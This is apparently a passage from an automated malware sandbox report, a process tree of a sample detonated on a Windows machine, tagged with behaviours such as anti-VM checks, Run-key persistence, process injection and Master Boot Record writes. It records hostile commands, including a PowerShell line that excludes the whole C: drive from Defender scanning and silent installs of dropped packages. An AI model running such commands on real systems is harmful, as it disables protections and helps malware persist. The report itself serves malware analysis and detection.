        Suspicious use of FindShellTrayWindow
        
        PID:2764
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5980
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2348
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:13712
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:6636
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:7088
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5296
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:11932
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4576
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Suspicious use of FindShellTrayWindow
        
        PID:11580
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        
        PID:2800
      - C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480910101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d2gvtuvg\d2gvtuvg.cmdline"
        7⤵
        
        PID:4068
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2759.tmp" "c:\Users\Admin\AppData\Local\Temp\d2gvtuvg\CSC425564E22D9641229ED8895A875E88F7.TMP"
        8⤵
        
        PID:1948
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:3340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4480
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10481850271\ArFLIYD.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3728
      - C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491920101\Pgpx359.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5608
      - C:\Users\Admin\AppData\Local\Temp\10491970101\8371767ff6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491970101\8371767ff6.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:5844
      - C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10491980101\Pgpx359.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3724
      - C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492010101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:676
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jyg2hzks\jyg2hzks.cmdline"
        7⤵
        
        PID:2848
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CC8.tmp" "c:\Users\Admin\AppData\Local\Temp\jyg2hzks\CSCD9EA5F39DBE94466B8E0375318E97DA.TMP"
        8⤵
        
        PID:4008
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5648
      - C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492020101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:5612
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\udv4too0\udv4too0.cmdline"
        7⤵
        
        PID:3948
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB7D.tmp" "c:\Users\Admin\AppData\Local\Temp\udv4too0\CSCC0231BC2967D4C708128AF45363C0D7.TMP"
        8⤵
        
        PID:2504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:428
      - C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492030101\UZPt0hR.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5384
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6108
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        Downloads MZ/PE file
        Adds Run key to start application
        
        PID:2076
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        Sets service image path in registry
        Executes dropped EXE
        Suspicious behavior: LoadsDriver
        
        PID:5972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:14136
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        Deletes itself
        Executes dropped EXE
        
        PID:2044
        
        C:\Users\Admin\AppData\Local\Temp\{89791724-7f53-4a55-9d9a-fc55daaa5c65}\259075a7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{89791724-7f53-4a55-9d9a-fc55daaa5c65}\259075a7.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        Executes dropped EXE
        Checks for VirtualBox DLLs, possible anti-VM trick
        System Location Discovery: System Language Discovery
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\{7fa4d5ac-2290-4c4e-863e-373768b90f43}\eb758663.exe
        
        C:/Users/Admin/AppData/Local/Temp/{7fa4d5ac-2290-4c4e-863e-373768b90f43}/\eb758663.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        Drops file in Drivers directory
        Sets service image path in registry
        Executes dropped EXE
        Impair Defenses: Safe Mode Boot
        Loads dropped DLL
        Adds Run key to start application
        Enumerates connected drives
        Writes to the Master Boot Record (MBR)
        Checks for VirtualBox DLLs, possible anti-VM trick
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: LoadsDriver
        
        PID:9164
      - C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492040101\larBxd7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:13836
      - C:\Users\Admin\AppData\Local\Temp\10492050101\b18d882399.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492050101\b18d882399.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:6784
      - C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492060101\9sWdA2p.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7064
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10492070271\ArFLIYD.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5124
      - C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492080101\AfkeY2q.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:3712
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:8400
      - C:\Users\Admin\AppData\Local\Temp\10492090101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492090101\Rm3cVPI.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:11260
      - C:\Users\Admin\AppData\Local\Temp\10492100101\qhjMWht.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492100101\qhjMWht.exe"
        6⤵
        
        PID:9620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:4548
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:964

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4732
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5956
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uyvfwbk3\uyvfwbk3.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB96.tmp" "c:\Users\Admin\AppData\Local\Temp\uyvfwbk3\CSC9D2A64F9ACC47EFA5EE9E298DA93C4.TMP"
      4⤵
      PID:2164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4016
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:3412
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1756

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:3904
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:6104

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:3972
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:664
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pilalak2\pilalak2.cmdline"
    3⤵
    PID:3568
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32F2.tmp" "c:\Users\Admin\AppData\Local\Temp\pilalak2\CSC972A2A946F304CB1A659B5C9E058FBCF.TMP"
      4⤵
      PID:2848
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:212
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4336
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4860
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:1188

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2864
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:5524
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      Loads dropped DLL
      PID:5716
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:5388
- C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe
  "C:\Users\Admin\AppData\Local\Insulin\steamerrorreporter.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2104
- - C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    C:\Users\Admin\AppData\Roaming\Servicemon\steamerrorreporter.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:7792
  - - C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      C:\Users\Admin\AppData\Local\Temp\remoteBggbv2.exe
      4⤵
      Loads dropped DLL
      PID:13060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\SysWOW64\cmd.exe
      4⤵
      System Location Discovery: System Language Discovery
      PID:11116

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5592

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:3996
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:5620

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:1064
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:636
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5koypwj0\5koypwj0.cmdline"
    3⤵
    PID:4780
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\5koypwj0\CSC2F2F97E5DAC448219AB05426ADE536C2.TMP"
      4⤵
      PID:5412
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
1⤵
PID:1196
- C:\Windows\explorer.exe
  explorer.exe C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  2⤵
  PID:5844

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:3844
- C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe
  "C:\Users\Admin\AppData\Roaming\blv20gPs\exp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5652
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nu3hbnym\nu3hbnym.cmdline"
    3⤵
    PID:2316
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB476.tmp" "c:\Users\Admin\AppData\Local\Temp\nu3hbnym\CSC62AED2BFDD5B4836A1C9C9809A5FCEEE.TMP"
      4⤵
      PID:5900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5896
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:6064
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:3980

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:14328

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{759d8c2d-fe1d-41be-8619-81267b0d226a}\d597609d-7c68-4671-b285-c6d7166535f2.cmd"
1⤵
PID:9268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9596
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9648
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9684
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9708
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10092
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3264
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10328
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10376
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10488
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10728
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10784
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10868
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11060
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11280
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11348
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:11392
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11500
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11552
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11636
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2668
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12564
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12592
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12640
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4588
